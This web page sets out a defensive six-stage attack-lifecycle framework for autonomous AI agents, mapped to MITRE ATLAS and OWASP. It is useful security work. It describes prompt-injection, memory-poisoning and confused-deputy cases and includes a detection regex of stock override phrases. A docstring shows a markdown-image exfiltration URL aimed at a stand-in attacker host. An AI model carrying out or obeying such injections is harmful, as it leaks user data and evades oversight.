A six-stage attack-lifecycle framework for autonomous AI agent systems. It builds on MITRE ATLAS (16 tactics, 84 techniques) and the OWASP LLM Top 10 v2.0, extending them for agents that chain decisions, use tools, delegate, and persist.
Dhanasekaran, M. (2026). The Agentic AI Kill Chain. magesh.ai/kill-chain

Existing frameworks don't account for the emergent security properties that arise when autonomy, long-term memory access, and dynamic tool use are combined.
Same structural concept as the Cyber Kill Chain (a sequential attack lifecycle), adapted for autonomous AI agents instead of network intrusion. Seven stages become six: weaponization is implicit in agent attacks, because crafting adversarial input is inseparable from delivering it.
MITRE ATLAS (16 tactics, 84 techniques) covers AI model attacks. OWASP LLM Top 10 covers application risks. This framework extends both into the agent-specific lifecycle — tool chains, delegation, memory persistence.
Every stage maps to a defensive control. Not an academic taxonomy — operational guidance built from hands-on experience building and securing agentic systems with Claude Code, Kiro, and MCP.
No vendor-specific recommendations. The framework applies to any agent architecture — whether you're building with Claude, GPT, Gemini, or open-source models. Patterns over products.
Every connection is an attack surface. Click a stage below to see where it strikes.
Maps the agent's tool access, permission boundaries, connected MCP servers, model type, system prompt constraints, and behavioral limits. Agent recon maps capability topology — not network topology.
Researchers demonstrated system prompt extraction from ChatGPT, Claude, and Gemini through iterative probing — asking models to repeat their instructions verbatim, or using multi-turn conversations to gradually extract constraint boundaries.
ATLAS AML.TA0001 (Reconnaissance) covers ML model recon. This stage extends it with agent-specific vectors: tool enumeration, permission boundary probing, and MCP server discovery.
Minimize information disclosure about agent capabilities. Don't reveal tool lists, permission structures, or system prompt details in responses.
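One lightweight control here is an egress filter that scrubs capability identifiers from outgoing agent replies. A minimal Python sketch, assuming a deployment-maintained list of internal identifiers; `INTERNAL_TOKENS` and `redact_capabilities` are illustrative names, not part of any framework:

```python
import re

# Hypothetical internal identifiers this deployment keeps out of replies:
# tool names, MCP server addresses, system prompt markers.
INTERNAL_TOKENS = [
    "filesystem_write",
    "mcp://internal-tools",
    "SYSTEM PROMPT:",
]

def redact_capabilities(reply: str, placeholder: str = "[redacted]") -> str:
    """Strip internal capability identifiers from an outgoing agent reply."""
    for token in INTERNAL_TOKENS:
        reply = re.sub(re.escape(token), placeholder, reply, flags=re.IGNORECASE)
    return reply
```

A blocklist like this is a backstop, not a primary control; the stronger move is to never place tool inventories or permission details where the model can echo them.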
Delivers adversarial input to alter agent behavior — through direct prompts, retrieved documents, tool responses, or data sources the agent consumes. The goal: change what the agent does, not just what it says.
Indirect prompt injection via web pages: a researcher embedded hidden instructions in a webpage that, when retrieved by a Bing Chat agent, caused it to exfiltrate the user's conversation history through a crafted URL. The agent followed the injected instruction because it couldn't distinguish retrieved content from user intent.
ATLAS AML.T0051 (Prompt Injection), AML.T0099 (Tool Data Poisoning) cover prompt and data poisoning. This stage extends them with tool schema injection, MCP protocol-level vectors, and context displacement attacks.
OWASP LLM01 (Prompt Injection) covers direct and indirect injection. This stage extends it with tool-response and protocol-level injection vectors specific to agent architectures.
Validate and sanitize all external inputs. Treat tool responses as untrusted. Pin system instructions outside the context window where possible.
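As a sketch of the "treat tool responses as untrusted" control: wrap each tool result in an explicit untrusted-data envelope and flag instruction-like phrases before the text enters the context window. The envelope format and the `SUSPICIOUS` pattern list are assumptions for illustration, not a standard:

```python
import html
import re

# Heuristic patterns that suggest injected instructions inside retrieved data.
SUSPICIOUS = re.compile(
    r"(ignore (all|previous|prior) instructions|you are now|system prompt)",
    re.IGNORECASE,
)

def wrap_tool_response(tool_name: str, payload: str) -> str:
    """Mark a tool response as untrusted data before it enters the context."""
    flagged = bool(SUSPICIOUS.search(payload))
    safe = html.escape(payload)  # neutralize markup-based smuggling
    header = f'<tool_output name="{tool_name}" trusted="false" flagged="{str(flagged).lower()}">'
    return f"{header}\n{safe}\n</tool_output>"
```

Pattern matching is a weak signal on its own; the envelope matters more, because it gives the model and downstream monitors a way to distinguish retrieved content from user intent.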
Takes control of the agent's decision-making — redirecting goals, overriding instructions, or manipulating the reasoning chain. The agent continues operating autonomously — toward the attacker's objectives.
Anthropic's own red-team research showed that Claude agents given tool access could be manipulated into executing multi-step attack sequences — reading files, modifying configs, and calling APIs — all from a single injected instruction that overrode the system prompt's constraints. The agent reasoned its way through each step autonomously.
This is where the Kill Chain adds the most. ATLAS and OWASP focus on model-level and application-level threats. This stage extends both into autonomous decision chain hijacking and goal substitution at the planning layer — building on OWASP LLM06 (Excessive Agency) with active hijacking of running agents.
Immutable system instructions. Reasoning chain monitoring. Behavioral anomaly detection against established baselines.
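Behavioral anomaly detection can start simply: compare each session's tool-call transitions against a baseline learned from trusted sessions. A minimal sketch, assuming the baseline bigrams were collected offline; all tool names here are illustrative:

```python
# Tool-call bigrams observed during normal operation (assumed to be
# collected offline from trusted sessions).
BASELINE_BIGRAMS = {
    ("search", "read_file"),
    ("read_file", "summarize"),
    ("summarize", "respond"),
}

def anomalous_transitions(tool_calls: list[str]) -> list[tuple[str, str]]:
    """Return tool-call transitions never seen in the trusted baseline."""
    bigrams = zip(tool_calls, tool_calls[1:])
    return [b for b in bigrams if b not in BASELINE_BIGRAMS]
```

A hijacked reasoning chain tends to produce transitions the agent never makes normally (e.g. `read_file` followed by an outbound send); flagging those for review catches goal substitution even when each individual call is permitted.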
Uses the hijacked agent to gain broader access — abusing tool permissions, chaining through multi-agent delegation, or bypassing human-in-the-loop controls. Agents trust other agents — exploit the trust model.
Researchers at UIUC demonstrated "confused deputy" attacks in multi-agent systems where a low-privilege agent crafted requests to a higher-privilege agent, inheriting its tool access. The orchestrator passed the request because inter-agent messages weren't treated as untrusted input — a trust boundary that doesn't exist in traditional systems.
ATLAS AML.TA0012 (Privilege Escalation) covers single-system escalation. This stage extends it into multi-agent delegation chains, confused deputy patterns in agent systems, and orchestrator compromise.
Least privilege for every tool and agent. No autoApprove for sensitive operations. Inter-agent authentication. Explicit delegation scoping.
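These controls translate directly into MCP client configuration. An illustrative fragment in a Kiro-style `mcp.json` shape (exact field names vary by client, and the server, path, and tool names are examples): filesystem access scoped to a single directory via the server's arguments, with auto-approval limited to one read-only tool.

```json
{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/workspace/project"],
      "disabled": false,
      "autoApprove": ["read_file"]
    }
  }
}
```

Under this shape, every tool not listed in `autoApprove` requires explicit human approval per invocation, which is exactly the human-in-the-loop boundary this stage attacks.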
Uses the agent's legitimate access to extract sensitive data. The agent itself is the exfiltration channel: it has sanctioned data access and sanctioned output channels, so exfiltration looks like normal agent behavior.
The Bing Chat markdown rendering attack: an injected instruction caused the agent to encode conversation data into an image URL. When the browser rendered the markdown, it sent an HTTP request to the attacker's server with the user's data as URL parameters — exfiltration through a legitimate rendering feature.
ATLAS AML.T0055 (Exfiltration via Tool Invocation) covers tool-based exfiltration. This stage extends it with cross-session memory leakage and behavioral side-channel patterns specific to persistent agents.
Monitor and log all tool invocations. Data loss prevention on agent outputs. Session-scoped memory with no cross-session persistence of sensitive data.
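A concrete DLP control for the markdown-rendering channel described above: rewrite any URL in agent output whose host is not on an approved list. A minimal Python sketch; `ALLOWED_HOSTS` is deployment-specific and the URL regex is deliberately simple:

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"docs.example.com", "api.example.com"}  # deployment-specific

URL_RE = re.compile(r"""https?://[^\s)"']+""")

def strip_unapproved_urls(output: str) -> str:
    """Replace URLs pointing outside the allowlist. Blocks markdown-image
    exfiltration of the form ![](https://attacker.tld/?q=<data>)."""
    def check(match: re.Match) -> str:
        host = urlparse(match.group(0)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else "[blocked-url]"
    return URL_RE.sub(check, output)
```

Run this on agent output before it reaches any renderer; a URL that never renders can't carry data out as query parameters.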
Establishes long-term presence by poisoning agent memory, injecting into configuration files, or creating callbacks. The agent itself becomes the persistence mechanism.
The SpAIware research demonstrated persistent memory injection in ChatGPT: an attacker embedded instructions in a document that, when processed by the agent, wrote malicious directives into long-term memory. Every future conversation then followed the injected instructions, across sessions, without the user's knowledge.
ATLAS AML.T0056 (Memory Manipulation) covers memory poisoning. This stage extends it into ecosystem persistence: instruction files, skill backdoors, MCP config manipulation, and agent startup poisoning.
Memory integrity verification. Config file integrity monitoring. Skill/plugin signing and verification. Regular memory audit and pruning.
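Config and instruction-file integrity monitoring can be as simple as hashing the files an agent loads at startup and alerting on drift. A minimal sketch, assuming the baseline snapshot is stored somewhere the agent cannot write; function names are illustrative:

```python
import hashlib
import pathlib

def snapshot(paths: list[str]) -> dict[str, str]:
    """Record SHA-256 digests of agent config/instruction files."""
    return {p: hashlib.sha256(pathlib.Path(p).read_bytes()).hexdigest()
            for p in paths}

def drifted(paths: list[str], baseline: dict[str, str]) -> list[str]:
    """Return files whose contents changed since the baseline snapshot."""
    current = snapshot(paths)
    return [p for p in paths if current[p] != baseline.get(p)]
```

Checking the snapshot before each agent startup turns a silent config-injection persistence mechanism into a loud integrity alert; the baseline must live outside the agent's write scope, or a hijacked agent simply re-baselines itself.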
Step through a realistic attack scenario against an AI coding agent. Each step maps to a kill chain stage.
Mapping all 16 ATLAS tactics against the Agentic AI Kill Chain. The Agent Extension column shows where the Kill Chain extends ATLAS coverage into agent-specific vectors.
| ATLAS Tactic | ID | Kill Chain Stage | Agent Extension |
|---|---|---|---|
| Reconnaissance | AML.TA0001 | 01 RECON | + Tool enumeration, permission probing, MCP discovery |
| Resource Development | AML.TA0002 | 02 INJECT | + Crafted tool schemas, poisoned MCP servers |
| Initial Access | AML.TA0003 | 02 INJECT | + Indirect injection via retrieved context, tool responses |
| ML Model Access | AML.TA0004 | 01 RECON | + Agent capability mapping beyond model access |
| Execution | AML.TA0005 | 03 HIJACK | + Autonomous execution via reasoning chain hijack |
| Persistence | AML.TA0006 | 06 PERSIST | + Memory poisoning, config injection, skill backdoors |
| Defense Evasion | AML.TA0007 | 03 HIJACK | + Reasoning chain manipulation to bypass safety checks |
| Discovery | AML.TA0008 | 01 RECON | + MCP server discovery, tool registry enumeration |
| Collection | AML.TA0009 | 05 EXFIL | + Agent reads data through legitimate tool access |
| ML Attack Staging | AML.TA0010 | 02 INJECT | + Context window displacement, schema poisoning |
| Credential Access | AML.TA0011 | 04 ESCALATE | + Tool credential harvesting (AML.T0098) |
| Privilege Escalation | AML.TA0012 | 04 ESCALATE | + Multi-agent delegation chains, confused deputy, orchestrator compromise |
| Lateral Movement | AML.TA0013 | 04 ESCALATE | + Inter-agent trust exploitation, sub-agent delegation |
| Exfiltration | AML.TA0014 | 05 EXFIL | + Cross-session memory leakage, behavioral side channels |
| Impact | AML.TA0015 | 03–06 | Impact spans multiple stages in agentic context |
| Command and Control | AML.TA0016 | 06 PERSIST | + Agent callbacks via APIs, webhook persistence |
Every OWASP LLM vulnerability amplifies in agentic context. This matrix assesses agent-specific severity for each category — because an agent that acts on a vulnerability is fundamentally different from a chatbot that outputs one.
| OWASP Category | Chatbot Risk | Agent Risk | Why It Amplifies |
|---|---|---|---|
| LLM01 — Prompt Injection | HIGH | CRITICAL | Agents act on injected instructions — tool calls, file writes, API requests |
| LLM02 — Sensitive Info Disclosure | MEDIUM | HIGH | Agents have broader system access — files, databases, credentials |
| LLM03 — Supply Chain | MEDIUM | HIGH | Each MCP server, tool, and plugin is a supply chain link |
| LLM04 — Data/Model Poisoning | MEDIUM | HIGH | Poisoned data affects autonomous decisions with real consequences |
| LLM05 — Improper Output Handling | HIGH | CRITICAL | Agent outputs become real actions — shell commands, code execution |
| LLM06 — Excessive Agency | MEDIUM | CRITICAL | The core agent risk — too many tools, too few guardrails, autoApprove enabled |
| LLM07 — System Prompt Leakage | LOW | MED-HIGH | Reveals agent capabilities, tool lists, permission structures |
| LLM08 — Vector/Embedding Weaknesses | MEDIUM | HIGH | Persistent memory poisoning across sessions |
| LLM09 — Misinformation | MEDIUM | HIGH | Hallucinations trigger real actions — wrong API calls, wrong file edits |
| LLM10 — Unbounded Consumption | MEDIUM | HIGH | Agent loops amplify cost attacks — recursive tool calls, infinite delegation |
MITRE ATLAS maps 16 tactics for attacking AI models. OWASP lists 10 ways LLM applications fail. The Agentic AI Kill Chain extends both into the full attack lifecycle against autonomous agent systems — agents that chain decisions, use tools, delegate, and persist.
Magesh Dhanasekaran — Senior Security Consultant, 17 years in cybersecurity. Built from hands-on experience securing and building agentic AI systems with Claude Code, Kiro, and MCP.
This framework is open for reference, citation, and use in security assessments. Please cite as:
Dhanasekaran, M. (2026). The Agentic AI Kill Chain. magesh.ai/kill-chain

Views are my own. This is a practitioner framework — it prioritizes operational utility over completeness. Cloud-agnostic. No vendor-specific recommendations.